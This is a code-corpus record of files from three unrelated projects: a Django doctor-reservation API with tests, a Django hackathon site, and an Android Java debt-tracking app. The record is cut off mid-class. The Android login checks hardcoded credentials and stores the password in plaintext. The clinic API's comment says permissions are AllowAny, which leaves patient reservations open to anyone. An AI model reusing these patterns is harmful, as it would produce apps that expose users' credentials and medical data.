return render(request, "core/index.html")
<file_sep>appdirs==1.4.4
asgiref==3.4.1
black==21.7b0
click==8.0.1
colorama==0.4.4
Django==3.2.6
django-debug-toolbar==3.2.2
djangorestframework==3.12.4
mypy-extensions==0.4.3
pathspec==0.9.0
pytz==2021.1
regex==2021.8.21
six==1.16.0
sqlparse==0.4.1
tomli==1.2.1
<file_sep>from core.models import *
from django.shortcuts import get_object_or_404
from rest_framework import generics
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.views import APIView
from .serializers import *
# project level permission is applied with allowany
@api_view(["GET"])
def api(request):
api_url = {
"list-Doc-Reservation": "doctor-appointment/<int:pk>",
"list-Patient-Reservation": "patient-appointment/<int:pk>",
"Register": "/register",
"Make-Reservation": "reservation",
"Update-Reservation": "manage-reservation/<int:pk>",
"Delete-Reservation": "delete-reservation/<int:pk>",
"List-All-Reservations": "show-reservation",
}
return Response(api_url)
class RegisterUser(generics.CreateAPIView):
serializer_class = RegisterSerlizer
class MakeReservation(generics.CreateAPIView):
serializer_class = ReservationSerializer
class ShowPatientReservation(APIView):
def get(self, request, pk):
pat = get_object_or_404(Patient, pk=pk)
print(pat)
data = Reservation.objects.filter(patient=pat)
patient_reservations = ReservationSerializer(data, many=True)
return Response(patient_reservations.data)
class ShowDoctorAppointmnet(APIView):
def get(self, request, pk):
doc = get_object_or_404(Doctor, pk=pk)
print(doc)
clinics = doc.get_doctor_clincs
data = Reservation.objects.filter(clinic__in=clinics)
doc_reservations = ReservationSerializer(data, many=True)
return Response(doc_reservations.data)
class ListReservation(generics.ListAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
class ReservationUpdate(generics.RetrieveUpdateAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
class ReservationDelete(generics.RetrieveDestroyAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
<file_sep>from datetime import datetime
from core.models import *
from django.contrib.auth.models import User
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
class ReservationTest(APITestCase):
"""
1-test view reservation for doctor endpoint
2-test view reservation for patient endpoint
3-test create reservation endpoint
4-test update reservation
5-test delete reservation
"""
def setUp(self):
self.doctor_data = Doctor.objects.create(username="doc1")
self.patient_data = Patient.objects.create(username="pat1")
self.clinic = Clinic.objects.create(
doctor=self.doctor_data,
name="clinc1",
price="13",
)
self.create_reservation_data = {"patient": 2, "clinic": 1}
self.reservation = Reservation.objects.create(patient=self.patient_data, clinic=self.clinic)
def test_create_reservation_endpoint(self):
"""
test create reservation
"""
url = reverse("api:make_reservation")
response = self.client.post(url, self.create_reservation_data, format="json")
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_view_patient_reservation(self):
"""
test list the patient reservations (if no doctor found --> return code 404)
"""
url = reverse("api:patient_reservations", kwargs={"pk": 2})
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_view_doctor_reservation(self):
"""
test list the doctor reservations (if no patient found --> return code 404)
"""
url = reverse("api:doctor_reservations", kwargs={"pk": 1})
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_update_reservation(self):
"""
test update reservation
"""
url = reverse("api:reservation_update", kwargs={"pk": 2})
self.updated_data = {"patient": 3, "clinic": 1}
response = self.client.put(url, self.updated_data, format="json")
# 404 because we done have patient 3
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_delete_reservation(self):
"""
test delete reservation
"""
url = reverse("api:reservation_delete", kwargs={"pk": 1})
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
| b817f15775c06e1578f460cf65cb073fab614942 | [
"Markdown",
"Python",
"Text"
] | 9 | Python | abdelrhman-adel-ahmed/Doctor-Clinic | 0a46c687f80692a2d6a19ed3d84b6b5c3dbfe6f2 | 007a7fa6209cf157cf60229ee8826af9f04783a6 |
refs/heads/main | <file_sep># Generated by Django 3.1.3 on 2021-06-20 08:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('home', '0005_auto_20210620_1208'),
]
operations = [
migrations.RenameField(
model_name='topic',
old_name='contetn',
new_name='content',
),
]
<file_sep>"""project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from project.apps.home import views as home_views
from project.apps.subcategory import views as subcategory_views
urlpatterns = [
path('admin/', admin.site.urls),
path('', home_views.home, name='home'),
path('<int:pk>/', home_views.sub_categories, name='sub_category'),
path('topic/<int:topic>/', home_views.topic, name='topic'),
path('<int:topic>/relate/', home_views.relate_to_topic, name='relate'),
path('<int:topic>/check_relate/', home_views.check_related, name='check_relate'),
#ajax
path('experience/<str:topic>', home_views.add_experience, name='add_experience'),
#about
path('about/', home_views.about, name='about'),
]
<file_sep># Generated by Django 3.1.3 on 2021-06-20 08:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0004_topic_contetn'),
]
operations = [
migrations.CreateModel(
name='Experience',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=255)),
('text', models.TextField()),
('date_created', models.DateTimeField(auto_now=True)),
('approved', models.BooleanField(default=False)),
],
),
migrations.AlterField(
model_name='category',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='topic',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
<file_sep>from django.shortcuts import render
from .models import Topic, Experience, SubCategory, Category
from django.http import HttpResponse, HttpRequest, HttpResponseRedirect, JsonResponse
# Create your views here.
def home(request):
context = {
}
return render(request, 'index2.html', context)
def topic(request, topic):
topic = Topic.objects.get(pk=topic)
context = {
'topic':topic,
'bg':topic.main_category.bg
}
return render(request, 'topic.html', context)
def add_experience(request, topic):
try:
topic = Topic.objects.get(pk=topic)
if request.method == 'POST':
email = request.POST.get('email')
text = request.POST.get('text')
experience = Experience.objects.create(email=email, text=text)
return JsonResponse({'result': True}, status=200)
except Exception as ex:
print(ex)
return JsonResponse({'result': 'Failed'}, status=200)
def sub_categories(request, pk):
category = Category.objects.get(pk=pk)
print(category.name)
sub_categories = SubCategory.objects.filter(category=category)
topics = Topic.objects.filter(main_category=category)
print(topics)
context = {
'category':category,
'sub_categories':sub_categories,
'topics': topics
}
return render(request, 'subcategory.html', context)
def relate_to_topic(request, topic):
topic = Topic.objects.get(pk=topic)
if request.session.get('related') == False:
topic.relation_count += 1
topic.save()
request.session['related'] = True
return JsonResponse({'result': True, 'count':topic.relation_count}, status=200)
else:
topic.relation_count -= 1
topic.save()
request.session['related'] = False
return JsonResponse({'result': False, 'count':topic.relation_count}, status=200)
def check_related(request, topic):
try:
topic = Topic.objects.get(pk=topic)
return JsonResponse({'result': request.session['related']}, status=200)
except Exception as ex:
print(ex)
return JsonResponse({'result': 'Empty'}, status=200)
def about(request):
context = {
}
return render(request, 'about.html', context)
<file_sep># Generated by Django 3.2.4 on 2021-06-19 09:20
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('description', models.CharField(max_length=500)),
],
),
migrations.CreateModel(
name='Window',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('main_category', models.OneToOneField(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='main_category', to='home.category')),
('sub_category', models.OneToOneField(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='sub_category', to='home.category')),
],
),
]
<file_sep>from django.db import models
# Create your models here.
class Category(models.Model):
name = models.CharField(max_length=100)
description = models.CharField(max_length=500)
bg = models.CharField(max_length=30)
def __str__(self):
return self.name
class SubCategory(models.Model):
category = models.ForeignKey(Category, on_delete=models.SET_NULL, blank=True, null=True)
name = models.CharField(max_length=100)
description = models.CharField(max_length=500)
def __str__(self):
return self.name
class Topic(models.Model):
title = models.CharField(max_length=255)
content = models.TextField()
svg = models.CharField(max_length=200, blank=True, null=True)
main_category = models.ForeignKey(Category, default=None, on_delete=models.CASCADE, related_name='main_category')
sub_category = models.ForeignKey(SubCategory, default=None, on_delete=models.CASCADE, related_name='sub_category')
relation_count = models.IntegerField(default=0)
def __str__(self):
return self.title
class Experience(models.Model):
email = models.EmailField(max_length=255, blank=False, null=False)
topic = models.ForeignKey(Topic, default=None, on_delete=models.CASCADE, related_name='topic')
text = models.TextField()
date_created = models.DateTimeField(auto_now=True)
approved = models.BooleanField(default=False)
def __str__(self):
return self.email
<file_sep>from django.shortcuts import render
from project.apps.home.models import Category, SubCategory
# Create your views here.
<file_sep># Generated by Django 3.1.3 on 2021-06-20 12:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0008_auto_20210620_1428'),
]
operations = [
migrations.AddField(
model_name='category',
name='bg',
field=models.CharField(default=1, max_length=30),
preserve_default=False,
),
migrations.AlterField(
model_name='category',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='experience',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='subcategory',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='topic',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
<file_sep># Generated by Django 3.2.4 on 2021-06-20 10:28
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('home', '0007_auto_20210620_1251'),
]
operations = [
migrations.AddField(
model_name='experience',
name='topic',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='topic', to='home.topic'),
),
migrations.AlterField(
model_name='category',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='experience',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='subcategory',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='topic',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
<file_sep># Generated by Django 3.2.4 on 2021-06-19 13:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0003_rename_count_topic_relation_count'),
]
operations = [
migrations.AddField(
model_name='topic',
name='contetn',
field=models.TextField(default='textfield'),
preserve_default=False,
),
]
<file_sep><script >
$(document).ready(function () {
const cookies = document.cookie
.split(';')
.map(cookie => cookie.split('='))
.reduce((accumulator, [key, value]) => ({ ...accumulator, [key.trim()]: decodeURIComponent(value) }), {});
function check_related(){
$.ajax({
data: {
'csrfmiddlewaretoken' : "{{ csrf_token }}",
}, // get the form data
url: "{% url 'check_relate' topic.pk %}",
type: 'POST',
success: function(response) {
if (response.result === true) {
console.log('Related')
document.getElementById('relation_count').innerText = '{{topic.relation_count}} Can Relate'
}else if (response.result == false) {
console.log('UnRelated')
document.getElementById('relation_count').innerText = "{{topic.relation_count}} Can't Relate"
}
},
// on error
error: function(response) {
// alert the error if any error occured
console.log(response.responseJSON)
}
});
return false;
}
check_related()
// catch the form's submit event
$('#relation_count').on('click', function () {
// create an AJAX call
$.ajax({
data: {
'csrfmiddlewaretoken' : "{{ csrf_token }}",
}, // get the form data
url: "{% url 'relate' topic.pk %}",
type: 'POST',
success: function(response) {
if (response.result === true) {
console.log('Related')
console.log(response.count)
document.getElementById('relation_count').innerText = response.count + ' Can Relate'
}else if (response.result == false) {
console.log('UnRelated')
document.getElementById('relation_count').innerText = response.count + " Can't Relate"
}
},
// on error
error: function(response) {
// alert the error if any error occured
console.log(response.responseJSON)
}
});
return false;
});
});
$('#add_experience').on('click', function () {
// create an AJAX call
$.ajax({
data: {
'csrfmiddlewaretoken' : "{{ csrf_token }}",
'email':document.getElementById('email').value
'text':document.getElementById('text').value
}, // get the form data
url: "{% url 'add_experience' topic.title %}",
type: 'POST',
success: function(response) {
if (response.result === true) {
}else if (response.result == 'Failed') {
console.log(response.result)
}
},
// on error
error: function(response) {
// alert the error if any error occured
console.log(response.responseJSON)
}
});
return false;
});
</script><file_sep># Generated by Django 3.2.4 on 2021-06-19 12:25
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('home', '0002_auto_20210619_1528'),
]
operations = [
migrations.RenameField(
model_name='topic',
old_name='count',
new_name='relation_count',
),
]
| 9a3434a52dc4696affd95cadd2d0fa536ce21920 | [
"JavaScript",
"Python"
] | 12 | Python | SabaOrk/ForSet-Hackathon | 5cb2a8f23a7ab93f7a12d24f3626ea44692689af | c53cd4f756e4c007a1fbd299b6851f6f4c6cd358 |
refs/heads/master | <repo_name>HReader/HReader.GenerateStorageQueries<file_sep>/HReader.GenerateStorageQueries/Program.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
namespace HReader.GenerateStorageQueries
{
public class Program
{
private const string Header = @"//==========================================================================
// This file was automatically generated by HReader.GenerateStorageQueries
//==========================================================================
using System;
namespace HReader.Core.Storage.Queries
{
internal partial class QueryManager
{
";
private const string Footer = @" }
}";
private static string GetLazy(string name, string ns = "")
{
var varName = $"{ns.Replace(".", "")}{name}";
varName = varName[0].ToString().ToLower() + varName.Substring(1);
return $" private readonly Lazy<string> {varName} = ReadLazy(\"{ns}{name}.sql\");";
}
private static string GetValue(string name, string ns = "")
{
var varName = $"{ns.Replace(".", "")}{name}";
var lowerVarName = varName[0].ToString().ToLower() + varName.Substring(1);
return $" public string {varName} => {lowerVarName}.Value;";
}
public static void Main(string[] args)
{
var dir = Assembly.GetExecutingAssembly().Location;
dir = Path.GetDirectoryName(dir) + "\\";
var lazyList = new List<string>();
var valueList = new List<string>();
foreach (var file in Directory.EnumerateFiles(dir, "*.sql", SearchOption.AllDirectories))
{
var fullname = file.Replace(dir, "").Replace(".sql", "");
if (fullname.IndexOf("\\", StringComparison.Ordinal) >= 0)
{
var lastindex = fullname.LastIndexOf("\\", StringComparison.Ordinal);
var ns = fullname.Substring(0, lastindex + 1).Replace("\\", ".");
var name = fullname.Substring(lastindex).Substring(1);
lazyList.Add(GetLazy(name, ns));
valueList.Add(GetValue(name, ns));
}
else
{
lazyList.Add(GetLazy(fullname));
valueList.Add(GetValue(fullname));
}
}
File.Delete("QueryManager.g.cs");
using (var writer = new StreamWriter("QueryManager.g.cs", false))
{
writer.Write(Header);
foreach (var lazy in lazyList)
{
writer.WriteLine(lazy);
}
writer.WriteLine();
foreach (var value in valueList)
{
writer.WriteLine(value);
}
writer.Write(Footer);
}
}
}
}
| 00bcf23bc7b15000e7904abd99618de2644154d1 | [
"C#"
] | 1 | C# | HReader/HReader.GenerateStorageQueries | 637ad346ea43261899da0941375b730ab9f8bd27 | e1b8106baba4110b6e8674d5eb107c58f37835ac |
refs/heads/master | <file_sep>package com.example.ciller.pm;
import android.database.Cursor;
import android.support.v7.app.AlertDialog;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.Spinner;
import android.widget.Toast;
public class Receivables extends AppCompatActivity {
DatabaseHelper myDatabase;
EditText etName, etAmount, etId;
Spinner spinnerUnit;
Button addReceivButton;
Button deleteReceivButton;
Button viewReceivButton;
Button viewUpdatesButton;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_receivables);
myDatabase = new DatabaseHelper(this);
etName = (EditText) findViewById(R.id.etNameReceivables);
etAmount = (EditText) findViewById(R.id.etAmountReceivables);
spinnerUnit = (Spinner) findViewById(R.id.spinnerUnitReceiv);
etId = (EditText) findViewById(R.id.etIdReceivables);
addReceivButton = (Button) findViewById(R.id.addReceivableButton);
deleteReceivButton = (Button) findViewById(R.id.deleteReceivablesButton);
viewReceivButton = (Button) findViewById(R.id.viewAllReceiv);
viewUpdatesButton = (Button) findViewById(R.id.updateReceivablesButton);
addReceivable();
viewAllReceivables();
updateReceivable();
deleteReceivable();
}
public void addReceivable() {
addReceivButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
boolean aFostAdaugat = myDatabase.insertReceivable(etName.getText().toString(), etAmount.getText().toString(),
spinnerUnit.getSelectedItem().toString());
if (aFostAdaugat == true)
Toast.makeText(Receivables.this, "A receivable was inserted", Toast.LENGTH_LONG).show();
else
Toast.makeText(Receivables.this, "Error", Toast.LENGTH_LONG).show();
}
}
);
}
public void showMessage(String t,String mesaj){
AlertDialog.Builder builder = new AlertDialog.Builder(this);
builder.setCancelable(true);
builder.setTitle(t);
builder.setMessage(mesaj);
builder.show();
}
public void viewAllReceivables(){
viewReceivButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
Cursor r = myDatabase.getReceivables();
if(r.getCount() == 0)
{
showMessage("Error", "No receivables found");
return;
}
StringBuffer b = new StringBuffer();
while(r.moveToNext())
{
b.append("Id :" + r.getString(0)+ "\n");
b.append("Name :" + r.getString(1)+ "\n");
b.append("Amount :"+r.getString(2)+ "\n");
b.append("Unit: "+r.getString(3)+ "\n");
}
showMessage("Receivables", b.toString());
}
});
}
public void updateReceivable()
{
viewUpdatesButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
boolean updateReusit = myDatabase.updateReceivable(etId.getText().toString(),
etName.getText().toString(), etAmount.getText().toString(),
spinnerUnit.getSelectedItem().toString());
if(updateReusit == true)
Toast.makeText(Receivables.this, "Update OK", Toast.LENGTH_LONG).show();
else
Toast.makeText(Receivables.this, "Error", Toast.LENGTH_LONG).show();
}
});
}
public void deleteReceivable()
{
deleteReceivButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
Integer randuriSterse = myDatabase.deleteReceivable(etId.getText().toString());
if (randuriSterse > 0)
Toast.makeText(Receivables.this, "Receivable removed", Toast.LENGTH_LONG).show();
else
Toast.makeText(Receivables.this, "Error", Toast.LENGTH_LONG).show();
}
});
}
}
<file_sep>package com.example.ciller.pm;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.text.TextUtils;
import android.view.View;
import android.widget.ArrayAdapter;
import android.widget.Button;
import android.widget.EditText;
import android.widget.ListView;
import android.widget.RatingBar;
import android.widget.RemoteViews;
import android.widget.SeekBar;
import android.widget.TimePicker;
import android.widget.Toast;
import android.widget.ToggleButton;
import com.google.firebase.database.DataSnapshot;
import com.google.firebase.database.DatabaseError;
import com.google.firebase.database.DatabaseReference;
import com.google.firebase.database.FirebaseDatabase;
import com.google.firebase.database.ValueEventListener;
import java.util.ArrayList;
import java.util.List;
public class Review extends AppCompatActivity {
EditText editTextReview3;
RatingBar ratingBarReview;
SeekBar seekBarReview;
ToggleButton toggleButtonReview;
EditText editTextReview4;
Button buttonSendFeedback;
DatabaseReference databaseReviews1;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_review);
databaseReviews1 = FirebaseDatabase.getInstance().getReference("review");
editTextReview3 = (EditText)findViewById(R.id.editTextReview3);
ratingBarReview = (RatingBar)findViewById(R.id.ratingBarReview);
seekBarReview = (SeekBar)findViewById(R.id.seekBarReview);
toggleButtonReview = (ToggleButton)findViewById(R.id.toggleButtonReview);
editTextReview4 = (EditText)findViewById(R.id.editTextReview4);
buttonSendFeedback = (Button)findViewById(R.id.buttonSendFeedback);
buttonSendFeedback.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
addReview();
}
});
}
protected void addReview(){
String email = editTextReview3.getText().toString().trim();
int experience = ratingBarReview.getNumStars();
int impact = seekBarReview.getProgress();
String recom = toggleButtonReview.getText().toString().trim();
//int hour = timePickerReview.getCurrentHour();
String feedback = editTextReview4.getText().toString().trim();
if(!TextUtils.isEmpty(email))
{
String id = databaseReviews1.push().getKey();
AllReviews r = new AllReviews(id, email, experience, impact, recom, feedback);
databaseReviews1.child(id).setValue(r);
Toast.makeText(this, "Review registered", Toast.LENGTH_LONG).show();
}else
{
Toast.makeText(this,"Please enter your email", Toast.LENGTH_LONG).show();
}
}
}
<file_sep>package com.example.ciller.pm;
/**
* Created by Ciller on 1/14/2018.
*/
public class AllReviews {
String reviewId;
String reviewEmail;
int reviewExperience;
int reviewImpact;
String reviewRecom;
// int reviewHour;
String reviewFeedback;
public AllReviews(String reviewId, String reviewEmail, int reviewExperience, int reviewImpact, String reviewRecom, String reviewFeedback) {
this.reviewId = reviewId;
this.reviewEmail = reviewEmail;
this.reviewExperience = reviewExperience;
this.reviewImpact = reviewImpact;
this.reviewRecom = reviewRecom;
// this.reviewHour = reviewHour;
this.reviewFeedback = reviewFeedback;
}
public String getReviewId() {
return reviewId;
}
public void setReviewId(String reviewId) {
this.reviewId = reviewId;
}
public String getReviewEmail() {
return reviewEmail;
}
public void setReviewEmail(String reviewEmail) {
this.reviewEmail = reviewEmail;
}
public int getReviewExperience() {
return reviewExperience;
}
public void setReviewExperience(int reviewExperience) {
this.reviewExperience = reviewExperience;
}
public int getReviewImpact() {
return reviewImpact;
}
public void setReviewImpact(int reviewImpact) {
this.reviewImpact = reviewImpact;
}
public String getReviewRecom() {
return reviewRecom;
}
public void setReviewRecom(String reviewRecom) {
this.reviewRecom = reviewRecom;
}
public String getReviewFeedback() {
return reviewFeedback;
}
public void setReviewFeedback(String reviewFeedback) {
this.reviewFeedback = reviewFeedback;
}
}
<file_sep>package com.example.ciller.pm;
import android.graphics.Color;
import android.support.v4.app.FragmentActivity;
import android.os.Bundle;
import android.text.style.TtsSpan;
import com.google.android.gms.maps.CameraUpdateFactory;
import com.google.android.gms.maps.GoogleMap;
import com.google.android.gms.maps.OnMapReadyCallback;
import com.google.android.gms.maps.SupportMapFragment;
import com.google.android.gms.maps.model.Circle;
import com.google.android.gms.maps.model.CircleOptions;
import com.google.android.gms.maps.model.LatLng;
import com.google.android.gms.maps.model.Marker;
import com.google.android.gms.maps.model.MarkerOptions;
import com.google.android.gms.maps.model.Polygon;
import com.google.android.gms.maps.model.PolygonOptions;
import com.google.android.gms.maps.model.PolylineOptions;
import java.util.ArrayList;
import java.util.List;
public class MapsActivity extends FragmentActivity implements OnMapReadyCallback {
private GoogleMap mMap;
Circle myCircle;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_maps);
// Obtain the SupportMapFragment and get notified when the map is ready to be used.
SupportMapFragment mapFragment = (SupportMapFragment) getSupportFragmentManager()
.findFragmentById(R.id.map);
mapFragment.getMapAsync(this);
}
/**
* Manipulates the map once available.
* This callback is triggered when the map is ready to be used.
* This is where we can add markers or lines, add listeners or move the camera. In this case,
* we just add a marker near Sydney, Australia.
* If Google Play services is not installed on the device, the user will be prompted to install
* it inside the SupportMapFragment. This method will only be triggered once the user has
* installed Google Play services and returned to the app.
*/
@Override
public void onMapReady(GoogleMap googleMap) {
mMap = googleMap;
LatLng BRD_Dorobanti = new LatLng(44.456159, 26.096627);
mMap.addMarker(new MarkerOptions().position(BRD_Dorobanti).title("BRD Dorobanti"));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(BRD_Dorobanti, 13));
LatLng BCR_Crangasi = new LatLng(44.454081, 26.053169);
mMap.addMarker(new MarkerOptions().position(BCR_Crangasi).title("BCR Crangasi"));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(BCR_Crangasi, 13));
LatLng Ciller_Home = new LatLng(44.475708, 26.068680);
mMap.addMarker(new MarkerOptions().position(Ciller_Home).title("Ciller's House"));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(Ciller_Home, 13));
LatLng Rent_Money = new LatLng(44.444437, 26.136483);
mMap.addMarker(new MarkerOptions().position(Rent_Money).title("Rent money"));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(Rent_Money, 13));
LatLng HomeSweetHome = new LatLng(44.430850, 25.993002 );
mMap.addMarker(new MarkerOptions().position(HomeSweetHome).title("Home Sweet Home"));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(HomeSweetHome, 13));
CircleOptions co = new CircleOptions();
co.center(HomeSweetHome);
co.radius(10000);
co.fillColor(Color.rgb(250, 120, 65));
co.strokeColor(10);
myCircle = mMap.addCircle(co);
LatLng Raiffeisen = new LatLng( 44.405684, 26.065268 );
mMap.addMarker(new MarkerOptions().position(Raiffeisen).title("Raiffeisen"));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(Raiffeisen, 13));
PolylineOptions po1 = new PolylineOptions();
po1.add(HomeSweetHome);
po1.add(BRD_Dorobanti);
po1.color(Color.rgb(155, 24, 240));
po1.width(10);
PolylineOptions po2 = new PolylineOptions();
po2.add(HomeSweetHome);
po2.add(BCR_Crangasi);
po2.color(Color.RED);
po2.width(10);
PolylineOptions po3 = new PolylineOptions();
po3.add(HomeSweetHome);
po3.add(Ciller_Home);
po3.color(Color.CYAN);
po3.width(10);
PolylineOptions po4 = new PolylineOptions();
po4.add(HomeSweetHome);
po4.add(Rent_Money);
po4.color(Color.GREEN);
po4.width(10);
PolylineOptions po5 = new PolylineOptions();
po5.add(HomeSweetHome);
po5.add(Raiffeisen);
po5.color(Color.rgb(0, 0, 0));
po5.width(10);
mMap.addPolyline(po1);
mMap.addPolyline(po2);
mMap.addPolyline(po3);
mMap.addPolyline(po4);
mMap.addPolyline(po5);
}
}
<file_sep>package com.example.ciller.pm;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
SharedPreferences shared = getSharedPreferences("login", Context.MODE_PRIVATE);
((EditText)findViewById(R.id.editTextMain1)).setText(shared.getString("username", ""));
((EditText)findViewById(R.id.editText2)).setText(shared.getString("password", ""));
}
protected void spreOperations(View v)
{
EditText user = (EditText)findViewById(R.id.editTextMain1);
EditText password = (EditText)findViewById(R.id.editText2);
if(user.getText().toString().equals("Ciller12") && password.getText().toString().equals("<PASSWORD>")) {
SharedPreferences sp = getSharedPreferences("login", Context.MODE_PRIVATE);
SharedPreferences.Editor editor = sp.edit();
editor.putString("username", user.getText().toString());
editor.putString("password", <PASSWORD>.getText().toString());
editor.commit();
Intent it = new Intent(getApplicationContext(), MenuOperations.class);
startActivity(it);
}
}
protected void metodaSignUp(View view)
{
Intent it = new Intent(getApplicationContext(),Register.class);
startActivity(it);
}
}
<file_sep>package com.example.ciller.pm;
import android.content.Intent;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
public class MenuOperations extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_menu_operations);
}
protected void spreLista(View v) {
Intent intent = new Intent(getApplicationContext(), AllDebtsList.class);
startActivity(intent);
}
protected void adaugaDatorie(View v)
{
Intent intent = new Intent(getApplicationContext(), DebtAddActivity.class);
startActivity(intent);
}
protected void spreBooks(View v)
{
Intent it = new Intent(getApplicationContext(), Books_WishList.class);
startActivity(it);
}
protected void spreReview(View v)
{
Intent it = new Intent(getApplicationContext(), Review.class);
startActivity(it);
}
protected void spreReceivables(View v)
{
Intent it = new Intent(getApplicationContext(), Receivables.class);
startActivity(it);
}
}
<file_sep># Android_BudgetManagementApp
Vezi documentatie pentru vizualizarea interfetei si a tuturor functionalitatilor produsului.
- Această aplicație a fost gândită inițial pentru a gestiona datoriile unei persoane față de diverse întreprinderi, prieteni, etc.
- Ulterior, am încercat să dezvolt aplicația și să gestionez si datoriile unor persoane față de utilizator, aceste sume înregistrându-se pe post de venituri.
- Mai mult, utilizatorul va beneficia și de o listă de dorințe care cumva îl va motiva să economisească bani pentru a-și permite obiectele pe care le dorește.
- Parsare fisiere JSON
- Prezinta si integrare cu Google Maps
- Baza de date : FIREBASE
<file_sep>package com.example.ciller.pm;
import java.io.Serializable;
/**
* Created by Ciller on 11/30/2017.
*/
public class DebtDetails {
private String name;
private String category;
private String amount;
private String unit;
private Integer createdDay;
private Integer createdMonth;
private Integer createdYear;
private Integer dueDay;
private Integer dueMonth;
private Integer dueYear;
private String payment;
private String description;
private boolean reminder;
public DebtDetails(String name, String category, String amount, String unit, Integer createdDay, Integer createdMonth, Integer createdYear, Integer dueDay, Integer dueMonth, Integer dueYear, String payment, String description, boolean reminder) {
this.name = name;
this.category = category;
this.amount = amount;
this.unit = unit;
this.createdDay = createdDay;
this.createdMonth = createdMonth;
this.createdYear = createdYear;
this.dueDay = dueDay;
this.dueMonth = dueMonth;
this.dueYear = dueYear;
this.payment = payment;
this.description = description;
this.reminder = reminder;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getCategory() {
return category;
}
public void setCategory(String category) {
this.category = category;
}
public String getAmount() {
return amount;
}
public void setAmount(String amount) {
this.amount = amount;
}
public String getUnit() {
